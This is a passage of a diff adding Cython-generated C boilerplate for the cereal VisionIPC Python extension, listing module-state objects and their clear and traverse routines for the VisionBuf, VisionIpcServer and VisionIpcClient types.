PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_register; + PyObject *__pyx_n_s_repr; + PyObject *__pyx_n_s_res; + PyObject *__pyx_n_s_rgb; + PyObject *__pyx_kp_s_s_s; + PyObject *__pyx_kp_s_s_s_d; + PyObject *__pyx_n_s_self; + PyObject *__pyx_kp_s_self_buf_cannot_be_converted_to; + PyObject *__pyx_kp_s_self_server_cannot_be_converted; + PyObject *__pyx_n_s_send; + PyObject *__pyx_n_s_set_name; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_n_s_shape; + PyObject *__pyx_n_s_size; + PyObject *__pyx_n_s_spec; + PyObject *__pyx_n_s_start; + PyObject *__pyx_n_s_start_listener; + PyObject *__pyx_n_s_state; + PyObject *__pyx_n_s_staticmethod; + PyObject *__pyx_n_s_step; + PyObject *__pyx_n_s_stop; + PyObject *__pyx_n_s_str; + PyObject *__pyx_n_s_stream; + PyObject *__pyx_n_s_stride; + PyObject *__pyx_kp_s_strided_and_direct; + PyObject *__pyx_kp_s_strided_and_direct_or_indirect; + PyObject *__pyx_kp_s_strided_and_indirect; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_struct; + PyObject *__pyx_n_s_super; + PyObject *__pyx_n_s_sys; + PyObject *__pyx_n_s_test; + PyObject *__pyx_n_s_timeout_ms; + PyObject *__pyx_n_s_timestamp_eof; + PyObject *__pyx_n_s_timestamp_sof; + PyObject *__pyx_n_s_tp; + PyObject *__pyx_kp_s_unable_to_allocate_array_data; + PyObject *__pyx_kp_s_unable_to_allocate_shape_and_str; + PyObject *__pyx_n_s_unpack; + PyObject *__pyx_n_s_update; + PyObject *__pyx_n_s_use_setstate; + PyObject *__pyx_n_s_uv_offset; + PyObject *__pyx_n_s_v; + PyObject *__pyx_n_s_value; + PyObject *__pyx_n_s_values; + PyObject *__pyx_n_s_version_info; + PyObject *__pyx_n_s_width; + PyObject *__pyx_int_0; + PyObject *__pyx_int_1; + PyObject *__pyx_int_3; + PyObject *__pyx_int_100; + PyObject *__pyx_int_112105877; + PyObject *__pyx_int_136983863; + PyObject *__pyx_int_184977713; + PyObject *__pyx_int_222419149; + PyObject *__pyx_int_228825662; + PyObject *__pyx_int_238750788; + PyObject *__pyx_int_neg_1; + PyObject *__pyx_slice__7; + PyObject *__pyx_tuple__2; + PyObject *__pyx_tuple__6; + PyObject *__pyx_tuple__10; + PyObject *__pyx_tuple__16; + PyObject *__pyx_tuple__17; + PyObject *__pyx_tuple__18; + PyObject *__pyx_tuple__20; + PyObject *__pyx_tuple__22; + PyObject *__pyx_tuple__24; + PyObject *__pyx_tuple__25; + PyObject *__pyx_tuple__29; + PyObject *__pyx_tuple__32; + PyObject *__pyx_tuple__34; + PyObject *__pyx_tuple__35; + PyObject *__pyx_tuple__36; + PyObject *__pyx_tuple__37; + PyObject *__pyx_tuple__38; + PyObject *__pyx_tuple__39; + PyObject *__pyx_tuple__40; + PyObject *__pyx_tuple__41; + PyObject *__pyx_tuple__42; + PyObject *__pyx_tuple__44; + PyObject *__pyx_tuple__48; + PyObject *__pyx_tuple__50; + PyObject *__pyx_tuple__52; + PyObject *__pyx_tuple__54; + PyObject *__pyx_tuple__58; + PyObject *__pyx_tuple__60; + PyObject *__pyx_tuple__61; + PyObject *__pyx_tuple__64; + PyObject *__pyx_codeobj__19; + PyObject *__pyx_codeobj__21; + PyObject *__pyx_codeobj__23; + PyObject *__pyx_codeobj__26; + PyObject *__pyx_codeobj__27; + PyObject *__pyx_codeobj__28; + PyObject *__pyx_codeobj__30; + PyObject *__pyx_codeobj__31; + PyObject *__pyx_codeobj__33; + PyObject *__pyx_codeobj__43; + PyObject *__pyx_codeobj__45; + PyObject *__pyx_codeobj__46; + PyObject *__pyx_codeobj__47; + PyObject *__pyx_codeobj__49; + PyObject *__pyx_codeobj__51; + PyObject *__pyx_codeobj__53; + PyObject *__pyx_codeobj__55; + PyObject *__pyx_codeobj__56; + PyObject *__pyx_codeobj__57; + PyObject *__pyx_codeobj__59; + PyObject *__pyx_codeobj__62; + PyObject *__pyx_codeobj__63; + PyObject *__pyx_codeobj__65; + PyObject *__pyx_codeobj__66; + PyObject *__pyx_codeobj__67; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_7cpython_4type_type); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_dtype); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flatiter); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_broadcast); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ndarray); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_generic); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_number); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_integer); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_signedinteger); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_inexact); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_floating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_complexfloating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flexible); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_character); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ufunc); + Py_CLEAR(clear_module_state->__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf); + Py_CLEAR(clear_module_state->__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf); + Py_CLEAR(clear_module_state->__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer); + Py_CLEAR(clear_module_state->__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer); + Py_CLEAR(clear_module_state->__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient); + Py_CLEAR(clear_module_state->__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient); + Py_CLEAR(clear_module_state->__pyx_ptype___Pyx_EnumMeta); + Py_CLEAR(clear_module_state->__Pyx_EnumMeta); + Py_CLEAR(clear_module_state->__pyx_array_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_array); + Py_CLEAR(clear_module_state->__pyx_MemviewEnum_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_MemviewEnum); + Py_CLEAR(clear_module_state->__pyx_memoryview_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_memoryview); + Py_CLEAR(clear_module_state->__pyx_memoryviewslice_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_memoryviewslice); + Py_CLEAR(clear_module_state->__pyx_kp_b_); + Py_CLEAR(clear_module_state->__pyx_kp_s_); + Py_CLEAR(clear_module_state->__pyx_n_s_ASCII); + Py_CLEAR(clear_module_state->__pyx_kp_s_All_dimensions_preceding_dimensi); + Py_CLEAR(clear_module_state->__pyx_n_s_AssertionError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Buffer_view_does_not_expose_stri); + Py_CLEAR(clear_module_state->__pyx_kp_s_Can_only_create_a_buffer_that_is); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_assign_to_read_only_memor); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_create_writable_memory_vi); + Py_CLEAR(clear_module_state->__pyx_kp_u_Cannot_index_with_type); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_transpose_memoryview_with); + Py_CLEAR(clear_module_state->__pyx_kp_s_Dimension_d_is_not_direct); + Py_CLEAR(clear_module_state->__pyx_n_s_Ellipsis); + Py_CLEAR(clear_module_state->__pyx_kp_s_Empty_shape_tuple_for_cython_arr); + Py_CLEAR(clear_module_state->__pyx_n_s_EnumBase); + Py_CLEAR(clear_module_state->__pyx_n_s_EnumType); + Py_CLEAR(clear_module_state->__pyx_n_s_ImportError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_CLEAR(clear_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0_2); + Py_CLEAR(clear_module_state->__pyx_n_s_IndexError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Index_out_of_bounds_axis_d); + Py_CLEAR(clear_module_state->__pyx_kp_s_Indirect_dimensions_not_supporte); + Py_CLEAR(clear_module_state->__pyx_n_s_IntEnum); + Py_CLEAR(clear_module_state->__pyx_n_s_IntFlag); + Py_CLEAR(clear_module_state->__pyx_kp_u_Invalid_mode_expected_c_or_fortr); + Py_CLEAR(clear_module_state->__pyx_kp_u_Invalid_shape_in_axis); + Py_CLEAR(clear_module_state->__pyx_n_s_MemoryError); + Py_CLEAR(clear_module_state->__pyx_kp_s_MemoryView_of_r_at_0x_x); + Py_CLEAR(clear_module_state->__pyx_kp_s_MemoryView_of_r_object); + Py_CLEAR(clear_module_state->__pyx_n_b_O); + Py_CLEAR(clear_module_state->__pyx_n_s_OrderedDict); + Py_CLEAR(clear_module_state->__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + Py_CLEAR(clear_module_state->__pyx_n_s_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumBase); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumBase___new); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumBase___repr); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumBase___str); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumMeta___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumMeta___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_FlagBase); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_FlagBase___new); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_FlagBase___repr); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_FlagBase___str); + Py_CLEAR(clear_module_state->__pyx_n_s_Sequence); + Py_CLEAR(clear_module_state->__pyx_kp_s_Step_may_not_be_zero_axis_d); + Py_CLEAR(clear_module_state->__pyx_kp_b_T); + Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Unable_to_convert_item_to_object); + Py_CLEAR(clear_module_state->__pyx_kp_s_Unknown_enum_value_s); + Py_CLEAR(clear_module_state->__pyx_n_s_VISION_STREAM_DRIVER); + Py_CLEAR(clear_module_state->__pyx_n_s_VISION_STREAM_MAP); + Py_CLEAR(clear_module_state->__pyx_n_s_VISION_STREAM_ROAD); + Py_CLEAR(clear_module_state->__pyx_n_s_VISION_STREAM_WIDE_ROAD); + Py_CLEAR(clear_module_state->__pyx_n_s_ValueError); + Py_CLEAR(clear_module_state->__pyx_n_s_View_MemoryView); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionBuf); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionBuf___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionBuf___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcClient); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcClient___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcClient___setstate_cytho); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcClient_available_stream); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcClient_connect); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcClient_is_connected); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcClient_recv); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcServer); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcServer___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcServer___setstate_cytho); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcServer_create_buffers); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcServer_create_buffers_w); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcServer_send); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionIpcServer_start_listener); + Py_CLEAR(clear_module_state->__pyx_n_s_VisionStreamType); + Py_CLEAR(clear_module_state->__pyx_kp_b__11); + Py_CLEAR(clear_module_state->__pyx_kp_b__12); + Py_CLEAR(clear_module_state->__pyx_kp_b__13); + Py_CLEAR(clear_module_state->__pyx_kp_u__14); + Py_CLEAR(clear_module_state->__pyx_kp_u__15); + Py_CLEAR(clear_module_state->__pyx_kp_u__3); + Py_CLEAR(clear_module_state->__pyx_kp_u__4); + Py_CLEAR(clear_module_state->__pyx_n_s__5); + Py_CLEAR(clear_module_state->__pyx_n_s__68); + Py_CLEAR(clear_module_state->__pyx_kp_u__8); + Py_CLEAR(clear_module_state->__pyx_kp_u__9); + Py_CLEAR(clear_module_state->__pyx_n_s_abc); + Py_CLEAR(clear_module_state->__pyx_n_s_allocate_buffer); + Py_CLEAR(clear_module_state->__pyx_kp_u_and); + Py_CLEAR(clear_module_state->__pyx_n_s_asarray); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_s_available_streams); + Py_CLEAR(clear_module_state->__pyx_n_s_base); + Py_CLEAR(clear_module_state->__pyx_n_s_block); + Py_CLEAR(clear_module_state->__pyx_n_s_blocking); + Py_CLEAR(clear_module_state->__pyx_n_s_buf); + Py_CLEAR(clear_module_state->__pyx_n_s_c); + Py_CLEAR(clear_module_state->__pyx_n_u_c); + Py_CLEAR(clear_module_state->__pyx_kp_s_cereal_visionipc_visionipc_pyx); + Py_CLEAR(clear_module_state->__pyx_kp_s_cereal_visionipc_visionipc_pyx_p); + Py_CLEAR(clear_module_state->__pyx_n_s_class); + Py_CLEAR(clear_module_state->__pyx_n_s_class_getitem); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_cls); + Py_CLEAR(clear_module_state->__pyx_n_s_collections); + Py_CLEAR(clear_module_state->__pyx_kp_s_collections_abc); + Py_CLEAR(clear_module_state->__pyx_n_s_conflate); + Py_CLEAR(clear_module_state->__pyx_n_s_connect); + Py_CLEAR(clear_module_state->__pyx_kp_s_contiguous_and_direct); + Py_CLEAR(clear_module_state->__pyx_kp_s_contiguous_and_indirect); + Py_CLEAR(clear_module_state->__pyx_n_s_count); + Py_CLEAR(clear_module_state->__pyx_n_s_create_buffers); + Py_CLEAR(clear_module_state->__pyx_n_s_create_buffers_with_sizes); + Py_CLEAR(clear_module_state->__pyx_n_s_data); + Py_CLEAR(clear_module_state->__pyx_n_s_dct); + Py_CLEAR(clear_module_state->__pyx_n_s_dict); + Py_CLEAR(clear_module_state->__pyx_n_s_dict_2); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_n_s_doc); + Py_CLEAR(clear_module_state->__pyx_n_s_dtype_is_object); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_n_s_encode); + Py_CLEAR(clear_module_state->__pyx_n_s_enum); + Py_CLEAR(clear_module_state->__pyx_n_s_enumerate); + Py_CLEAR(clear_module_state->__pyx_n_s_error); + Py_CLEAR(clear_module_state->__pyx_n_s_extra); + Py_CLEAR(clear_module_state->__pyx_n_s_flags); + Py_CLEAR(clear_module_state->__pyx_n_s_format); + Py_CLEAR(clear_module_state->__pyx_n_s_fortran); + Py_CLEAR(clear_module_state->__pyx_n_u_fortran); + Py_CLEAR(clear_module_state->__pyx_n_s_frame_id); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_get); + Py_CLEAR(clear_module_state->__pyx_n_s_get_endpoint_name); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_kp_u_got); + Py_CLEAR(clear_module_state->__pyx_kp_u_got_differing_extents_in_dimensi); + Py_CLEAR(clear_module_state->__pyx_n_s_height); + Py_CLEAR(clear_module_state->__pyx_n_s_id); + Py_CLEAR(clear_module_state->__pyx_n_s_import); + Py_CLEAR(clear_module_state->__pyx_n_s_index); + Py_CLEAR(clear_module_state->__pyx_n_s_init); + Py_CLEAR(clear_module_state->__pyx_n_s_init_subclass); + Py_CLEAR(clear_module_state->__pyx_n_s_initializing); + Py_CLEAR(clear_module_state->__pyx_n_s_is_connected); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_itemsize); + Py_CLEAR(clear_module_state->__pyx_kp_s_itemsize_0_for_cython_array); + Py_CLEAR(clear_module_state->__pyx_n_s_join); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_member_names); + Py_CLEAR(clear_module_state->__pyx_n_s_members); + Py_CLEAR(clear_module_state->__pyx_n_s_memview); + Py_CLEAR(clear_module_state->__pyx_n_s_metaclass); + Py_CLEAR(clear_module_state->__pyx_n_s_mode); + Py_CLEAR(clear_module_state->__pyx_n_s_module); + Py_CLEAR(clear_module_state->__pyx_n_s_module_2); + Py_CLEAR(clear_module_state->__pyx_n_s_mro_entries); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_name_2); + Py_CLEAR(clear_module_state->__pyx_n_s_ndim); + Py_CLEAR(clear_module_state->__pyx_n_s_new); + Py_CLEAR(clear_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_CLEAR(clear_module_state->__pyx_n_s_np); + Py_CLEAR(clear_module_state->__pyx_n_s_num_buffers); + Py_CLEAR(clear_module_state->__pyx_n_s_numpy); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_CLEAR(clear_module_state->__pyx_n_s_obj); + Py_CLEAR(clear_module_state->__pyx_n_s_pack); + Py_CLEAR(clear_module_state->__pyx_n_s_parents); + Py_CLEAR(clear_module_state->__pyx_n_s_pickle); + Py_CLEAR(clear_module_state->__pyx_n_s_prepare); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_checksum); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_result); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_type); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_unpickle_Enum); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_unpickle___Pyx_EnumMeta); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_vtable); + Py_CLEAR(clear_module_state->__pyx_n_s_qualname); + Py_CLEAR(clear_module_state->__pyx_n_s_range); + Py_CLEAR(clear_module_state->__pyx_n_s_recv); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_register); + Py_CLEAR(clear_module_state->__pyx_n_s_repr); + Py_CLEAR(clear_module_state->__pyx_n_s_res); + Py_CLEAR(clear_module_state->__pyx_n_s_rgb); + Py_CLEAR(clear_module_state->__pyx_kp_s_s_s); + Py_CLEAR(clear_module_state->__pyx_kp_s_s_s_d); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_kp_s_self_buf_cannot_be_converted_to); + Py_CLEAR(clear_module_state->__pyx_kp_s_self_server_cannot_be_converted); + Py_CLEAR(clear_module_state->__pyx_n_s_send); + Py_CLEAR(clear_module_state->__pyx_n_s_set_name); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_shape); + Py_CLEAR(clear_module_state->__pyx_n_s_size); + Py_CLEAR(clear_module_state->__pyx_n_s_spec); + Py_CLEAR(clear_module_state->__pyx_n_s_start); + Py_CLEAR(clear_module_state->__pyx_n_s_start_listener); + Py_CLEAR(clear_module_state->__pyx_n_s_state); + Py_CLEAR(clear_module_state->__pyx_n_s_staticmethod); + Py_CLEAR(clear_module_state->__pyx_n_s_step); + Py_CLEAR(clear_module_state->__pyx_n_s_stop); + Py_CLEAR(clear_module_state->__pyx_n_s_str); + Py_CLEAR(clear_module_state->__pyx_n_s_stream); + Py_CLEAR(clear_module_state->__pyx_n_s_stride); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_direct); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_direct_or_indirect); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_indirect); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_struct); + Py_CLEAR(clear_module_state->__pyx_n_s_super); + Py_CLEAR(clear_module_state->__pyx_n_s_sys); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_n_s_timeout_ms); + Py_CLEAR(clear_module_state->__pyx_n_s_timestamp_eof); + Py_CLEAR(clear_module_state->__pyx_n_s_timestamp_sof); + Py_CLEAR(clear_module_state->__pyx_n_s_tp); + Py_CLEAR(clear_module_state->__pyx_kp_s_unable_to_allocate_array_data); + Py_CLEAR(clear_module_state->__pyx_kp_s_unable_to_allocate_shape_and_str); + Py_CLEAR(clear_module_state->__pyx_n_s_unpack); + Py_CLEAR(clear_module_state->__pyx_n_s_update); + Py_CLEAR(clear_module_state->__pyx_n_s_use_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_uv_offset); + Py_CLEAR(clear_module_state->__pyx_n_s_v); + Py_CLEAR(clear_module_state->__pyx_n_s_value); + Py_CLEAR(clear_module_state->__pyx_n_s_values); + Py_CLEAR(clear_module_state->__pyx_n_s_version_info); + Py_CLEAR(clear_module_state->__pyx_n_s_width); + Py_CLEAR(clear_module_state->__pyx_int_0); + Py_CLEAR(clear_module_state->__pyx_int_1); + Py_CLEAR(clear_module_state->__pyx_int_3); + Py_CLEAR(clear_module_state->__pyx_int_100); + Py_CLEAR(clear_module_state->__pyx_int_112105877); + Py_CLEAR(clear_module_state->__pyx_int_136983863); + Py_CLEAR(clear_module_state->__pyx_int_184977713); + Py_CLEAR(clear_module_state->__pyx_int_222419149); + Py_CLEAR(clear_module_state->__pyx_int_228825662); + Py_CLEAR(clear_module_state->__pyx_int_238750788); + Py_CLEAR(clear_module_state->__pyx_int_neg_1); + Py_CLEAR(clear_module_state->__pyx_slice__7); + Py_CLEAR(clear_module_state->__pyx_tuple__2); + Py_CLEAR(clear_module_state->__pyx_tuple__6); + Py_CLEAR(clear_module_state->__pyx_tuple__10); + Py_CLEAR(clear_module_state->__pyx_tuple__16); + Py_CLEAR(clear_module_state->__pyx_tuple__17); + Py_CLEAR(clear_module_state->__pyx_tuple__18); + Py_CLEAR(clear_module_state->__pyx_tuple__20); + Py_CLEAR(clear_module_state->__pyx_tuple__22); + Py_CLEAR(clear_module_state->__pyx_tuple__24); + Py_CLEAR(clear_module_state->__pyx_tuple__25); + Py_CLEAR(clear_module_state->__pyx_tuple__29); + Py_CLEAR(clear_module_state->__pyx_tuple__32); + Py_CLEAR(clear_module_state->__pyx_tuple__34); + Py_CLEAR(clear_module_state->__pyx_tuple__35); + Py_CLEAR(clear_module_state->__pyx_tuple__36); + Py_CLEAR(clear_module_state->__pyx_tuple__37); + Py_CLEAR(clear_module_state->__pyx_tuple__38); + Py_CLEAR(clear_module_state->__pyx_tuple__39); + Py_CLEAR(clear_module_state->__pyx_tuple__40); + Py_CLEAR(clear_module_state->__pyx_tuple__41); + Py_CLEAR(clear_module_state->__pyx_tuple__42); + Py_CLEAR(clear_module_state->__pyx_tuple__44); + Py_CLEAR(clear_module_state->__pyx_tuple__48); + Py_CLEAR(clear_module_state->__pyx_tuple__50); + Py_CLEAR(clear_module_state->__pyx_tuple__52); + Py_CLEAR(clear_module_state->__pyx_tuple__54); + Py_CLEAR(clear_module_state->__pyx_tuple__58); + Py_CLEAR(clear_module_state->__pyx_tuple__60); + Py_CLEAR(clear_module_state->__pyx_tuple__61); + Py_CLEAR(clear_module_state->__pyx_tuple__64); + Py_CLEAR(clear_module_state->__pyx_codeobj__19); + Py_CLEAR(clear_module_state->__pyx_codeobj__21); + Py_CLEAR(clear_module_state->__pyx_codeobj__23); + Py_CLEAR(clear_module_state->__pyx_codeobj__26); + Py_CLEAR(clear_module_state->__pyx_codeobj__27); + Py_CLEAR(clear_module_state->__pyx_codeobj__28); + Py_CLEAR(clear_module_state->__pyx_codeobj__30); + Py_CLEAR(clear_module_state->__pyx_codeobj__31); + Py_CLEAR(clear_module_state->__pyx_codeobj__33); + Py_CLEAR(clear_module_state->__pyx_codeobj__43); + Py_CLEAR(clear_module_state->__pyx_codeobj__45); + Py_CLEAR(clear_module_state->__pyx_codeobj__46); + Py_CLEAR(clear_module_state->__pyx_codeobj__47); + Py_CLEAR(clear_module_state->__pyx_codeobj__49); + Py_CLEAR(clear_module_state->__pyx_codeobj__51); + Py_CLEAR(clear_module_state->__pyx_codeobj__53); + Py_CLEAR(clear_module_state->__pyx_codeobj__55); + Py_CLEAR(clear_module_state->__pyx_codeobj__56); + Py_CLEAR(clear_module_state->__pyx_codeobj__57); + Py_CLEAR(clear_module_state->__pyx_codeobj__59); + Py_CLEAR(clear_module_state->__pyx_codeobj__62); + Py_CLEAR(clear_module_state->__pyx_codeobj__63); + Py_CLEAR(clear_module_state->__pyx_codeobj__65); + Py_CLEAR(clear_module_state->__pyx_codeobj__66); + Py_CLEAR(clear_module_state->__pyx_codeobj__67); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_7cpython_4type_type); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_dtype); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flatiter); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_broadcast); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ndarray); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_generic); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_number); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_integer); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_signedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_inexact); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_floating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_complexfloating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flexible); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_character); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ufunc); + Py_VISIT(traverse_module_state->__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf); + Py_VISIT(traverse_module_state->__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf); + Py_VISIT(traverse_module_state->__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer); + 